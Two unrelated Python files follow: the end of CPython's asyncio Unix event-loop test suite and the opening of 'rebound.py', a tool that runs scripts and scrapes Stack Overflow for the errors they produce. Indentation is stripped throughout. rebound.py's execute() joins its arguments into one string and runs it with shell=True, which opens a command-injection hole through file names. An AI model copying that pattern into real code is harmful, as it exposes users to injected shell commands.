def test_write_eof(self):
tr = self.write_pipe_transport()
tr.write_eof()
self.assertTrue(tr.is_closing())
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
def test_write_eof_pending(self):
tr = self.write_pipe_transport()
tr._buffer = [b'data']
tr.write_eof()
self.assertTrue(tr.is_closing())
self.assertFalse(self.protocol.connection_lost.called)
class AbstractChildWatcherTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
watcher = asyncio.AbstractChildWatcher()
self.assertRaises(
NotImplementedError, watcher.add_child_handler, f, f)
self.assertRaises(
NotImplementedError, watcher.remove_child_handler, f)
self.assertRaises(
NotImplementedError, watcher.attach_loop, f)
self.assertRaises(
NotImplementedError, watcher.close)
self.assertRaises(
NotImplementedError, watcher.is_active)
self.assertRaises(
NotImplementedError, watcher.__enter__)
self.assertRaises(
NotImplementedError, watcher.__exit__, f, f, f)
class BaseChildWatcherTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
watcher = unix_events.BaseChildWatcher()
self.assertRaises(
NotImplementedError, watcher._do_waitpid, f)
WaitPidMocks = collections.namedtuple("WaitPidMocks",
("waitpid",
"WIFEXITED",
"WIFSIGNALED",
"WEXITSTATUS",
"WTERMSIG",
))
class ChildWatcherTestsMixin:
ignore_warnings = mock.patch.object(log.logger, "warning")
def setUp(self):
super().setUp()
self.loop = self.new_test_loop()
self.running = False
self.zombies = {}
with mock.patch.object(
self.loop, "add_signal_handler") as self.m_add_signal_handler:
self.watcher = self.create_watcher()
self.watcher.attach_loop(self.loop)
def waitpid(self, pid, flags):
if isinstance(self.watcher, asyncio.SafeChildWatcher) or pid != -1:
self.assertGreater(pid, 0)
try:
if pid < 0:
return self.zombies.popitem()
else:
return pid, self.zombies.pop(pid)
except KeyError:
pass
if self.running:
return 0, 0
else:
raise ChildProcessError()
def add_zombie(self, pid, returncode):
self.zombies[pid] = returncode + 32768
def WIFEXITED(self, status):
return status >= 32768
def WIFSIGNALED(self, status):
return 32700 < status < 32768
def WEXITSTATUS(self, status):
self.assertTrue(self.WIFEXITED(status))
return status - 32768
def WTERMSIG(self, status):
self.assertTrue(self.WIFSIGNALED(status))
return 32768 - status
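    # A brief note (added for clarity, not part of the original test file): the
    # helpers above fake os.waitpid() status words. add_zombie(pid, rc) stores
    # rc + 32768, so a non-negative exit code rc yields a status >= 32768
    # (WIFEXITED, with WEXITSTATUS == status - 32768), while a negative rc,
    # meaning "killed by signal -rc", yields a status just below 32768
    # (WIFSIGNALED, with WTERMSIG == 32768 - status).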
def test_create_watcher(self):
self.m_add_signal_handler.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
def waitpid_mocks(func):
def wrapped_func(self):
def patch(target, wrapper):
return mock.patch(target, wraps=wrapper,
new_callable=mock.Mock)
with patch('os.WTERMSIG', self.WTERMSIG) as m_WTERMSIG, \
patch('os.WEXITSTATUS', self.WEXITSTATUS) as m_WEXITSTATUS, \
patch('os.WIFSIGNALED', self.WIFSIGNALED) as m_WIFSIGNALED, \
patch('os.WIFEXITED', self.WIFEXITED) as m_WIFEXITED, \
patch('os.waitpid', self.waitpid) as m_waitpid:
func(self, WaitPidMocks(m_waitpid,
m_WIFEXITED, m_WIFSIGNALED,
m_WEXITSTATUS, m_WTERMSIG,
))
return wrapped_func
@waitpid_mocks
def test_sigchld(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(42, callback, 9, 10, 14)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child is running
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (returncode 12)
self.running = False
self.add_zombie(42, 12)
self.watcher._sig_chld()
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
callback.assert_called_once_with(42, 12, 9, 10, 14)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
callback.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(42, 13)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
# sigchld called again
self.zombies.clear()
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_two_children(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register child 1
with self.watcher:
self.running = True
self.watcher.add_child_handler(43, callback1, 7, 8)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register child 2
with self.watcher:
self.watcher.add_child_handler(44, callback2, 147, 18)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# children are running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 1 terminates (signal 3)
self.add_zombie(43, -3)
self.watcher._sig_chld()
callback1.assert_called_once_with(43, -3, 7, 8)
self.assertFalse(callback2.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
callback1.reset_mock()
# child 2 still running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 2 terminates (code 108)
self.add_zombie(44, 108)
self.running = False
self.watcher._sig_chld()
callback2.assert_called_once_with(44, 108, 147, 18)
self.assertFalse(callback1.called)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
callback2.reset_mock()
# ensure that the children are effectively reaped
self.add_zombie(43, 14)
self.add_zombie(44, 15)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
# sigchld called again
self.zombies.clear()
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_two_children_terminating_together(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register child 1
with self.watcher:
self.running = True
self.watcher.add_child_handler(45, callback1, 17, 8)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register child 2
with self.watcher:
self.watcher.add_child_handler(46, callback2, 1147, 18)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# children are running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 1 terminates (code 78)
# child 2 terminates (signal 5)
self.add_zombie(45, 78)
self.add_zombie(46, -5)
self.running = False
self.watcher._sig_chld()
callback1.assert_called_once_with(45, 78, 17, 8)
callback2.assert_called_once_with(46, -5, 1147, 18)
self.assertTrue(m.WIFSIGNALED.called)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
m.WEXITSTATUS.reset_mock()
callback1.reset_mock()
callback2.reset_mock()
# ensure that the children are effectively reaped
self.add_zombie(45, 14)
self.add_zombie(46, 15)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_race_condition(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
# child terminates before being registered
self.add_zombie(50, 4)
self.watcher._sig_chld()
self.watcher.add_child_handler(50, callback, 1, 12)
callback.assert_called_once_with(50, 4, 1, 12)
callback.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(50, -1)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_sigchld_replace_handler(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(51, callback1, 19)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register the same child again
with self.watcher:
self.watcher.add_child_handler(51, callback2, 21)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (signal 8)
self.running = False
self.add_zombie(51, -8)
self.watcher._sig_chld()
callback2.assert_called_once_with(51, -8, 21)
self.assertFalse(callback1.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
callback2.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(51, 13)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_remove_handler(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(52, callback, 1984)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# unregister the child
self.watcher.remove_child_handler(52)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (code 99)
self.running = False
self.add_zombie(52, 99)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_sigchld_unknown_status(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(53, callback, -19)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# terminate with unknown status
self.zombies[53] = 1178
self.running = False
self.watcher._sig_chld()
callback.assert_called_once_with(53, 1178, -19)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
callback.reset_mock()
m.WIFEXITED.reset_mock()
m.WIFSIGNALED.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(53, 101)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_remove_child_handler(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
callback3 = mock.Mock()
# register children
with self.watcher:
self.running = True
self.watcher.add_child_handler(54, callback1, 1)
self.watcher.add_child_handler(55, callback2, 2)
self.watcher.add_child_handler(56, callback3, 3)
# remove child handler 1
self.assertTrue(self.watcher.remove_child_handler(54))
# remove child handler 2 multiple times
self.assertTrue(self.watcher.remove_child_handler(55))
self.assertFalse(self.watcher.remove_child_handler(55))
self.assertFalse(self.watcher.remove_child_handler(55))
# all children terminate
self.add_zombie(54, 0)
self.add_zombie(55, 1)
self.add_zombie(56, 2)
self.running = False
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
callback3.assert_called_once_with(56, 2, 3)
@waitpid_mocks
def test_sigchld_unhandled_exception(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(57, callback)
# raise an exception
m.waitpid.side_effect = ValueError
with mock.patch.object(log.logger,
'error') as m_error:
self.assertEqual(self.watcher._sig_chld(), None)
self.assertTrue(m_error.called)
@waitpid_mocks
def test_sigchld_child_reaped_elsewhere(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(58, callback)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates
self.running = False
self.add_zombie(58, 4)
# waitpid is called elsewhere
os.waitpid(58, os.WNOHANG)
m.waitpid.reset_mock()
# sigchld
with self.ignore_warnings:
self.watcher._sig_chld()
if isinstance(self.watcher, asyncio.FastChildWatcher):
            # here the FastChildWatcher enters a deadlock
# (there is no way to prevent it)
self.assertFalse(callback.called)
else:
callback.assert_called_once_with(58, 255)
@waitpid_mocks
def test_sigchld_unknown_pid_during_registration(self, m):
# register two children
callback1 = mock.Mock()
callback2 = mock.Mock()
with self.ignore_warnings, self.watcher:
self.running = True
# child 1 terminates
self.add_zombie(591, 7)
# an unknown child terminates
self.add_zombie(593, 17)
self.watcher._sig_chld()
self.watcher.add_child_handler(591, callback1)
self.watcher.add_child_handler(592, callback2)
callback1.assert_called_once_with(591, 7)
self.assertFalse(callback2.called)
@waitpid_mocks
def test_set_loop(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(60, callback)
# attach a new loop
old_loop = self.loop
self.loop = self.new_test_loop()
patch = mock.patch.object
with patch(old_loop, "remove_signal_handler") as m_old_remove, \
patch(self.loop, "add_signal_handler") as m_new_add:
self.watcher.attach_loop(self.loop)
m_old_remove.assert_called_once_with(
signal.SIGCHLD)
m_new_add.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
# child terminates
self.running = False
self.add_zombie(60, 9)
self.watcher._sig_chld()
callback.assert_called_once_with(60, 9)
@waitpid_mocks
def test_set_loop_race_condition(self, m):
# register 3 children
callback1 = mock.Mock()
callback2 = mock.Mock()
callback3 = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(61, callback1)
self.watcher.add_child_handler(62, callback2)
self.watcher.add_child_handler(622, callback3)
# detach the loop
old_loop = self.loop
self.loop = None
with mock.patch.object(
old_loop, "remove_signal_handler") as m_remove_signal_handler:
with self.assertWarnsRegex(
RuntimeWarning, 'A loop is being detached'):
self.watcher.attach_loop(None)
m_remove_signal_handler.assert_called_once_with(
signal.SIGCHLD)
# child 1 & 2 terminate
self.add_zombie(61, 11)
self.add_zombie(62, -5)
# SIGCHLD was not caught
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(callback3.called)
# attach a new loop
self.loop = self.new_test_loop()
with mock.patch.object(
self.loop, "add_signal_handler") as m_add_signal_handler:
self.watcher.attach_loop(self.loop)
m_add_signal_handler.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
callback1.assert_called_once_with(61, 11) # race condition!
callback2.assert_called_once_with(62, -5) # race condition!
self.assertFalse(callback3.called)
callback1.reset_mock()
callback2.reset_mock()
# child 3 terminates
self.running = False
self.add_zombie(622, 19)
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
callback3.assert_called_once_with(622, 19)
@waitpid_mocks
def test_close(self, m):
# register two children
callback1 = mock.Mock()
with self.watcher:
self.running = True
# child 1 terminates
self.add_zombie(63, 9)
# other child terminates
self.add_zombie(65, 18)
self.watcher._sig_chld()
self.watcher.add_child_handler(63, callback1)
self.watcher.add_child_handler(64, callback1)
self.assertEqual(len(self.watcher._callbacks), 1)
if isinstance(self.watcher, asyncio.FastChildWatcher):
self.assertEqual(len(self.watcher._zombies), 1)
with mock.patch.object(
self.loop,
"remove_signal_handler") as m_remove_signal_handler:
self.watcher.close()
m_remove_signal_handler.assert_called_once_with(
signal.SIGCHLD)
self.assertFalse(self.watcher._callbacks)
if isinstance(self.watcher, asyncio.FastChildWatcher):
self.assertFalse(self.watcher._zombies)
class SafeChildWatcherTests(ChildWatcherTestsMixin, test_utils.TestCase):
def create_watcher(self):
return asyncio.SafeChildWatcher()
class FastChildWatcherTests(ChildWatcherTestsMixin, test_utils.TestCase):
def create_watcher(self):
return asyncio.FastChildWatcher()
class PolicyTests(unittest.TestCase):
def create_policy(self):
return asyncio.DefaultEventLoopPolicy()
def test_get_default_child_watcher(self):
policy = self.create_policy()
self.assertIsNone(policy._watcher)
watcher = policy.get_child_watcher()
self.assertIsInstance(watcher, asyncio.ThreadedChildWatcher)
self.assertIs(policy._watcher, watcher)
self.assertIs(watcher, policy.get_child_watcher())
def test_get_child_watcher_after_set(self):
policy = self.create_policy()
watcher = asyncio.FastChildWatcher()
policy.set_child_watcher(watcher)
self.assertIs(policy._watcher, watcher)
self.assertIs(watcher, policy.get_child_watcher())
def test_get_child_watcher_thread(self):
def f():
policy.set_event_loop(policy.new_event_loop())
self.assertIsInstance(policy.get_event_loop(),
asyncio.AbstractEventLoop)
watcher = policy.get_child_watcher()
self.assertIsInstance(watcher, asyncio.SafeChildWatcher)
self.assertIsNone(watcher._loop)
policy.get_event_loop().close()
policy = self.create_policy()
policy.set_child_watcher(asyncio.SafeChildWatcher())
th = threading.Thread(target=f)
th.start()
th.join()
def test_child_watcher_replace_mainloop_existing(self):
policy = self.create_policy()
loop = policy.get_event_loop()
# Explicitly setup SafeChildWatcher,
# default ThreadedChildWatcher has no _loop property
watcher = asyncio.SafeChildWatcher()
policy.set_child_watcher(watcher)
watcher.attach_loop(loop)
self.assertIs(watcher._loop, loop)
new_loop = policy.new_event_loop()
policy.set_event_loop(new_loop)
self.assertIs(watcher._loop, new_loop)
policy.set_event_loop(None)
self.assertIs(watcher._loop, None)
loop.close()
new_loop.close()
class TestFunctional(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
def tearDown(self):
self.loop.close()
asyncio.set_event_loop(None)
def test_add_reader_invalid_argument(self):
def assert_raises():
return self.assertRaisesRegex(ValueError, r'Invalid file object')
cb = lambda: None
with assert_raises():
self.loop.add_reader(object(), cb)
with assert_raises():
self.loop.add_writer(object(), cb)
with assert_raises():
self.loop.remove_reader(object())
with assert_raises():
self.loop.remove_writer(object())
def test_add_reader_or_writer_transport_fd(self):
def assert_raises():
return self.assertRaisesRegex(
RuntimeError,
r'File descriptor .* is used by transport')
async def runner():
tr, pr = await self.loop.create_connection(
lambda: asyncio.Protocol(), sock=rsock)
try:
cb = lambda: None
with assert_raises():
self.loop.add_reader(rsock, cb)
with assert_raises():
self.loop.add_reader(rsock.fileno(), cb)
with assert_raises():
self.loop.remove_reader(rsock)
with assert_raises():
self.loop.remove_reader(rsock.fileno())
with assert_raises():
self.loop.add_writer(rsock, cb)
with assert_raises():
self.loop.add_writer(rsock.fileno(), cb)
with assert_raises():
self.loop.remove_writer(rsock)
with assert_raises():
self.loop.remove_writer(rsock.fileno())
finally:
tr.close()
rsock, wsock = socket.socketpair()
try:
self.loop.run_until_complete(runner())
finally:
rsock.close()
wsock.close()
if __name__ == '__main__':
unittest.main()
|
rebound.py
|
##########
## GLOBALS
##########
import urwid
import re
import sys
import os
from bs4 import BeautifulSoup
import requests
from queue import Queue
from subprocess import PIPE, Popen
from threading import Thread
import webbrowser
import time
from urwid.widget import (BOX, FLOW, FIXED)
import random
SO_URL = "https://stackoverflow.com"
# ASCII color codes
GREEN = '\033[92m'
GRAY = '\033[90m'
CYAN = '\033[36m'
RED = '\033[31m'
YELLOW = '\033[33m'
END = '\033[0m'
UNDERLINE = '\033[4m'
BOLD = '\033[1m'
# Scroll actions
SCROLL_LINE_UP = "line up"
SCROLL_LINE_DOWN = "line down"
SCROLL_PAGE_UP = "page up"
SCROLL_PAGE_DOWN = "page down"
SCROLL_TO_TOP = "to top"
SCROLL_TO_END = "to end"
# Scrollbar positions
SCROLLBAR_LEFT = "left"
SCROLLBAR_RIGHT = "right"
USER_AGENTS = [
"Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Firefox/59",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)',
'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
]
##################
## FILE ATTRIBUTES
##################
def get_language(file_path):
"""Returns the language a file is written in."""
if file_path.endswith(".py"):
return "python3"
elif file_path.endswith(".js"):
return "node"
elif file_path.endswith(".go"):
return "go run"
elif file_path.endswith(".rb"):
return "ruby"
elif file_path.endswith(".java"):
return 'javac' # Compile Java Source File
elif file_path.endswith(".class"):
return 'java' # Run Java Class File
elif file_path.endswith(".cpp"):
return "cplusplus"
else:
return '' # Unknown language
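# Illustrative sketch (added for clarity, not part of the original module):
# the extension-to-command mapping implemented by get_language() above.
def _example_get_language():
    assert get_language("script.py") == "python3"
    assert get_language("server.js") == "node"
    assert get_language("Main.java") == "javac"    # compile a .java source file
    assert get_language("Main.class") == "java"    # run a compiled class file
    assert get_language("notes.txt") == ""         # unsupported file type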
def get_error_message(error, language):
"""Filters the stack trace from stderr and returns only the error message."""
if error == '':
return None
elif language == "python3":
if any(e in error for e in ["KeyboardInterrupt", "SystemExit", "GeneratorExit"]): # Non-compiler errors
return None
else:
return error.split('\n')[-2].strip()
elif language == "node":
return error.split('\n')[4][1:]
elif language == "go run":
return error.split('\n')[1].split(": ", 1)[1][1:]
elif language == "ruby":
error_message = error.split('\n')[0]
return error_message[error_message.rfind(": ") + 2:]
elif language == "javac":
m = re.search(r'.*error:(.*)', error.split('\n')[0])
return m.group(1) if m else None
elif language == "java":
for line in error.split('\n'):
# Multiple error formats
m = re.search(r'.*(Exception|Error):(.*)', line)
if m and m.group(2):
return m.group(2)
m = re.search(r'Exception in thread ".*" (.*)', line)
if m and m.group(1):
return m.group(1)
return None
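# Illustrative sketch (added for clarity, not part of the original module): how
# get_error_message() reduces a Python traceback to its final error line. The
# sample stderr text below is hypothetical.
def _example_get_error_message():
    sample_stderr = (
        "Traceback (most recent call last):\n"
        '  File "test.py", line 1, in <module>\n'
        "    print(undefined_name)\n"
        "NameError: name 'undefined_name' is not defined\n"
    )
    # For python3, the second-to-last line of the trace is returned.
    assert get_error_message(sample_stderr, "python3") == \
        "NameError: name 'undefined_name' is not defined"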
#################
## FILE EXECUTION
#################
## Helper Functions ##
def read(pipe, funcs):
"""Reads and pushes piped output to a shared queue and appropriate lists."""
for line in iter(pipe.readline, b''):
for func in funcs:
func(line.decode("utf-8"))
pipe.close()
def write(get):
"""Pulls output from shared queue and prints to terminal."""
for line in iter(get, None):
print(line)
## Main ##
def execute(command):
"""Executes a given command and clones stdout/err to both variables and the
terminal (in real-time)."""
print(command)
    if command[0] == 'cplusplus':
        command[0] = 'g++'
    args = command  # keep the original argument list; `command` is rebound to a string below
    command = " ".join(command)
print(command)
process = Popen(
command,
cwd=None,
shell=True,
close_fds=True,
stdout=PIPE,
stderr=PIPE,
bufsize=1
)
output, errors = [], []
pipe_queue = Queue() # Wowee, thanks CS 225
# Threads for reading stdout and stderr pipes and pushing to a shared queue
stdout_thread = Thread(target=read, args=(process.stdout, [pipe_queue.put, output.append]))
stderr_thread = Thread(target=read, args=(process.stderr, [pipe_queue.put, errors.append]))
writer_thread = Thread(target=write, args=(pipe_queue.get,)) # Thread for printing items in the queue
# Spawns each thread
for thread in (stdout_thread, stderr_thread, writer_thread):
thread.daemon = True
thread.start()
process.wait()
for thread in (stdout_thread, stderr_thread):
thread.join()
pipe_queue.put(None)
output = ' '.join(output)
errors = ' '.join(errors)
if "java" != command[0] and not os.path.isfile(command[1]): # File doesn't exist, for java, command[1] is a class name instead of a file
return (None, None)
else:
return (output, errors)
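# Illustrative sketch (added for clarity, not part of the original module): how
# main() below invokes execute(). "buggy.py" is a hypothetical file name.
def _example_execute():
    output, errors = execute(["python3", "buggy.py"])
    if (output, errors) == (None, None):
        return  # the file does not exist
    print(get_error_message(errors, "python3"))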
###############
## WEB SCRAPING
###############
## Helper Functions ##
def stylize_code(soup):
"""Identifies and stylizes code in a question or answer."""
